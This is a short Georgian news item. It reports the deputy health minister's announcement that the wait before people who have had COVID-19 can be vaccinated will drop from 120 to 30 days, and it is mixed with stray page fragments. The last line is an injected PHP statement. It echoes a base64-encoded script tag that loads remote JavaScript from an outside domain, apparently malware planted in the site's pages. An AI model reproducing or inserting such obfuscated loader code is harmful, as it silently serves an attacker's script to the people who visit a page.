celsiusi
ავერსი საქკაბელი
ჯანდაცვის მინისტრის მოადგილე თამარ გაბუნიას განცხადებით, უახლოეს მომავალში, კორონავირუსგადატანილ მოქალაქეებს ვაქცინაცია არა 120 დღის, არამედ 30 დღის შემდეგ შეეძლებათ. მისი თქმით, შესაბამისი გადაწყვეტილება უწყებათშორისმა საბჭომ მიიღო და დადგენილება, სავარაუდოდ, 26 ივლისისთვის იქნება მზად.
 
„ამერიკის დაავადებათა კონტროლის ცენტრის რეკომენდაციაა, რომ კორონავირუსის გადატანიდან 30 დღის შემდეგ აცრა გაკეთდეს. გამომდინარე იქიდან, რომ ვაქცინების საკმარისი რაოდენობა არ გვქონდა, თავდაპირველად, შემოვიღეთ ვირუსის გასვლიდან 120-დღიანი პერიოდი...
 
დღეს ეს პრობლემა აღმოფხვრილია, ამიტომ დღეების რაოდენობა 30-დღემდე შემცირდება ზუსტად ისე, როგორც ეს აშშ-შია. ასე რომ, ყველა ადამიანს, რომელმაც კორონავირუსი გადაიტანა, შესაძლებლობა ექნება, დარეგისტრირდეს და აიცრას. უკვე კვირის ბოლომდე ბრძანება მომზადდება და სავარაუდოდ, ორშაბათიდან ამ ჯგუფისთვისაც რეგისტრაცია იქნება შესაძლებელი“, - განაცხადა თამარ გაბუნიამ.
1318
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");